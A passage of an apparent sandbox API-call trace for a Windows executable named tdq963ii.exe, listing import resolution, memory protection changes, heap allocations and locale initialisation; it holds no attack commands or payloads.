lpProcName="CreateProcessW") returned 0x76d4103d [0199.404] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0199.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0199.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0199.405] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0199.405] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0199.405] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0199.406] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0199.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0199.406] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0199.406] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0199.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0199.407] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0199.407] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0199.407] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0199.407] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0199.408] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0199.408] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0199.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0199.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0199.409] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0199.409] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0199.409] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0199.409] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0199.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0199.410] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0199.410] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0199.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0199.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0199.411] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0199.411] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0199.411] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0199.411] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0199.412] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0199.412] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0199.412] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0199.412] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0199.413] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0199.413] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0199.413] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0199.413] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.414] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0199.414] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0199.414] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0199.414] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0199.414] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0199.414] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0199.415] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0199.415] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0199.415] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0199.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0199.415] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0199.415] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0199.415] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0199.416] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0199.416] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0199.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0199.416] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0199.416] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0199.417] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0199.417] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0199.417] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0199.417] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0199.417] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0199.417] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0199.417] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0199.417] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0199.418] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0199.418] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0199.418] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0199.418] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0199.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0199.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0199.419] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0199.419] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0199.419] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0199.419] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0199.419] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0199.420] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0199.420] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0199.420] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0199.420] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0199.421] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0199.421] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0199.421] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0199.421] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0199.421] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0199.422] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0199.422] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0199.422] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0199.422] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0199.422] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0199.423] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0199.423] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0199.423] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0199.423] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0199.423] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0199.423] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0199.423] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0199.424] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0199.424] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0199.424] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0199.424] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0199.425] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0199.425] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0199.425] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0199.425] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0199.425] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0199.425] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0199.425] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0199.426] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0199.426] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0199.426] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0199.426] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0199.426] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0199.427] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0199.427] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0199.427] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0199.427] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0199.428] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0199.788] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0199.801] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x301daf80, dwHighDateTime=0x1d68287)) [0199.801] GetCurrentThreadId () returned 0x570 [0199.801] GetCurrentProcessId () returned 0xb34 [0199.801] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=32014034345) returned 1 [0199.808] GetProcessHeap () returned 0x8e0000 [0200.173] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0200.173] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0200.174] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0200.174] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0200.174] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0200.175] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0200.175] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0200.175] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0200.175] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0200.175] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0200.175] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0200.176] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0200.176] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0200.176] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0200.176] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0200.176] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0200.177] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0200.177] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0200.177] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0200.178] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0200.178] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0200.178] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0200.178] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0200.179] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0200.179] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0200.179] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0200.179] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0200.179] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0200.179] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0200.179] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0200.179] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0200.180] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0200.180] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0200.180] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0200.805] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3bc) returned 0x8f6090 [0200.805] GetCurrentThreadId () returned 0x570 [0200.805] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x18) returned 0x8f6458 [0200.805] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x800) returned 0x8f6478 [0200.806] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Seyes.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x45e44651, hStdError=0x0)) [0200.806] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0200.806] GetFileType (hFile=0x3) returned 0x2 [0200.806] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0200.806] GetFileType (hFile=0x80) returned 0x3 [0200.806] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0200.806] GetFileType (hFile=0xb) returned 0x2 [0200.807] GetCommandLineW () returned="tdq963ii.exe -accepteula \"Seyes.jtp\" -nobanner" [0200.807] GetEnvironmentStringsW () returned 0x8f6c80* [0200.807] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0xb7a) returned 0x8f7808 [0200.810] FreeEnvironmentStringsW (penv=0x8f6c80) returned 1 [0200.810] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0200.810] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x6e) returned 0x8f6c80 [0200.813] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x8f6cf8 [0200.813] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3e) returned 0x8f83a8 [0200.827] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6c) returned 0x8f6da0 [0200.827] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6e) returned 0x8f6e18 [0200.827] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x78) returned 0x8ef8b8 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x62) returned 0x8f6e90 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2e) returned 0x8f6f00 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x48) returned 0x8f6f38 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1e) returned 0x8f5a60 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x28) returned 0x8f6f88 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1a) returned 0x8f5a88 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x4a) returned 0x8f6fb8 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x72) returned 0x8ef938 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x30) returned 0x8f7010 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2e) returned 0x8f7048 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1c) returned 0x8f5ab0 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x8f7080 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7c) returned 0x8f7160 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x36) returned 0x8f71e8 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3a) returned 0x8f83f0 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x8f7228 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x8f72c0 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x30) returned 0x8f72f0 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x36) returned 0x8f7328 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x48) returned 0x8f7368 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x52) returned 0x8f73b8 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3c) returned 0x8f8438 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x18) returned 0x8f7418 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x82) returned 0x8f7438 [0200.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2e) returned 0x8f74c8 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1e) returned 0x8f5ad8 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2c) returned 0x8f7500 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x54) returned 0x8f7538 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x52) returned 0x8f7598 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2a) returned 0x8f75f8 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3c) returned 0x8f8480 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x54) returned 0x8f7630 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x8f7690 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x30) returned 0x8f76c0 [0200.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8c) returned 0x8f76f8 [0200.829] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f7808 | out: hHeap=0x8e0000) returned 1 [0201.164] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x800) returned 0x8f7790 [0201.164] GetLastError () returned 0x0 [0201.165] SetLastError (dwErrCode=0x0) [0201.165] GetLastError () returned 0x0 [0201.165] SetLastError (dwErrCode=0x0) [0201.165] GetLastError () returned 0x0 [0201.165] SetLastError (dwErrCode=0x0) [0201.165] GetACP () returned 0x4e4 [0201.165] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x220) returned 0x8f7f98 [0201.165] GetLastError () returned 0x0 [0201.166] SetLastError (dwErrCode=0x0) [0201.166] IsValidCodePage (CodePage=0x4e4) returned 1 [0201.166] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0201.166] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0201.168] GetLastError () returned 0x0 [0201.168] SetLastError (dwErrCode=0x0) [0201.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0201.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0201.170] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0201.170] GetLastError () returned 0x0 [0201.170] SetLastError (dwErrCode=0x0) [0201.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0201.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0201.171] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0201.171] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 